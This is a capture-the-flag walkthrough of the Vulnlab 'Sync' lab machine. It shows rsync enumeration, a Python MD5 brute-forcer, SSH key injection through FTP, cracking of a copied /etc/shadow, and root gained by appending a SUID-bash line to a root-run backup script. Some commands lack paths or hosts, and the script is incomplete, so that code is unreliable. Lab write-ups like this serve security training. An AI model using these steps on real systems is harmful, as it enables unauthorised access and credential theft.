Vulnlab - Sync

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This post details the exploitation of a Linux server running FTP, HTTP, Rsync, and SSH services. The attack involves leveraging the Rsync service to retrieve sensitive information, crack hashed credentials, and ultimately escalate privileges to root.


The following Nmap scan revealed open ports and services:

21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 38:a3:50:22:36:86:89:4b:11:aa:2c:ea:9a:79:ff:40 (ECDSA)
|_  256 b9:1f:df:2a:71:ec:f9:f2:76:14:2b:84:7c:d7:a6:1d (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Login
873/tcp open  rsync   (protocol version 31)

Key findings:

  • FTP (vsftpd 3.0.5) and HTTP (Apache 2.4.52) services for potential file storage or web application vulnerabilities.
  • Rsync (protocol version 31) accessible for enumeration.
  • SSH (OpenSSH 8.9p1) for potential lateral movement.


Enumerating Rsync

The Rsync service revealed an accessible directory named httpd:

└─$ rsync
httpd           web backup

The httpd directory was copied locally:

└─$ mkdir rsync

└─$ rsync -av rsync:// rsync
receiving incremental file list

sent 123 bytes  received 16,850 bytes  11,315.33 bytes/sec
total size is 16,426  speedup is 0.97

Discovering Sensitive Data

The site.db file within the db/ directory contained hashed credentials for two users:

Post image

Additionally, the www/index.php file revealed the hashing structure used to generate the MD5 hashes:

$secure = "6c4972f3717a5e881e282ad3105de01e";
$hash = md5("$secure|$username|$password");


Cracking Passwords

With the MD5 hash structure identified, a Python script was created to brute-force the hashes using a wordlist:

import argparse
import hashlib

def crack_hashes(hashes_file, users_file, passwords_file, secure):
    with open(hashes_file, "r") as f:
        hashes = [line.strip() for line in f]

    with open(users_file, "r") as f:
        users = [line.strip() for line in f]

    with open(passwords_file, "r", encoding="latin-1") as f:
        passwords = [line.strip() for line in f]

    for target_hash in hashes:
        hash_found = False
        for user in users:
            for password in passwords:
                to_hash = f"{secure}|{user}|{password}"
                test_hash = hashlib.md5(to_hash.encode()).hexdigest()

                if test_hash == target_hash:
                    print(f"[FOUND] {target_hash}: {user}|{password}")
                    hash_found = True
            if hash_found:

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Hash Cracker for MD5($secure|$username|$password)")
    parser.add_argument("hashes_file", help="Path to the file containing target hashes")
    parser.add_argument("users_file", help="Path to the file containing usernames")
    parser.add_argument("passwords_file", help="Path to the file containing passwords")
    parser.add_argument("secure", help="Fixed secure string used in the hash generation")

    args = parser.parse_args()

    crack_hashes(args.hashes_file, args.users_file, args.passwords_file,

Executing the script revealed the plaintext password for triss:

└─$ python3 hashes.txt users.txt /usr/share/wordlists/rockyou.txt 6c4972f3717a5e881e282ad3105de01e
[FOUND] a0de4d7f81676c3ea9eabcadfd2536f6: triss|gerald

Gaining Access via FTP

The credentials for triss were used to log into the FTP server with FileZilla. A public SSH key was injected into the .ssh/authorized_keys file of triss, enabling SSH access:

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SSH access was then established:

└─$ ssh triss@    
triss@ip-10-10-200-238:~$ id
uid=1003(triss) gid=1003(triss) groups=1003(triss)

Privilege Escalation

Identifying Backup Script Vulnerability

A backup script /usr/local/bin/ was discovered, owned by sa but executed by root:

Post image

triss@ip-10-10-200-238:~$ ls -la /usr/local/bin/
-rwxr-xr-x 1 sa sa 211 Apr 19  2023 /usr/local/bin/

The script copies sensitive files, including passwd and shadow, to a backup directory:

triss@ip-10-10-200-238:~$ cat /usr/local/bin/

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup

Retrieving Sensitive Files

One of the backup files was copied and extracted:

triss@ip-10-10-200-238:~$ cp /backup/ .
triss@ip-10-10-200-238:~$ unzip
   creating: tmp/backup/
  inflating: tmp/backup/rsyncd.conf  
   creating: tmp/backup/httpd/
   creating: tmp/backup/httpd/www/
  inflating: tmp/backup/httpd/www/dashboard.php  
  inflating: tmp/backup/httpd/www/logout.php  
  inflating: tmp/backup/httpd/www/index.php  
   creating: tmp/backup/httpd/migrate/
   creating: tmp/backup/httpd/db/
  inflating: tmp/backup/httpd/db/site.db  
  inflating: tmp/backup/passwd       
  inflating: tmp/backup/shadow

The passwd and shadow files were used to create a format compatible with John the Ripper:

└─$ scp triss@ shadow 
└─$ scp triss@ passwd
└─$ unshadow passwd shadow > unshadow.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow.txt 
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sakura           (sa)     
gerald           (jennifer)     
gerald           (triss)

Accessing jennifer and Obtaining User Flag

The jennifer account was accessed with its cracked password, revealing the user flag:

triss@ip-10-10-200-238:~$ su jennifer
jennifer@ip-10-10-200-238:~$ cat user.txt

Escalating to Root via Backup Script Manipulation

With access to the sa account, the backup script was modified to set the SUID bit on /bin/bash:

sa@ip-10-10-200-238:~$ echo "chmod ug+s /bin/bash" >> /usr/local/bin/

After a short wait, the SUID bit was applied:

sa@ip-10-10-200-238:/home/triss$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash

Executing the SUID binary granted root access:

sa@ip-10-10-200-238:/home/triss$ bash -p
bash-5.1# whoami

The root flag was retrieved:

bash-5.1# cd /root
bash-5.1# ls
root.txt  snap
bash-5.1# cat root.txt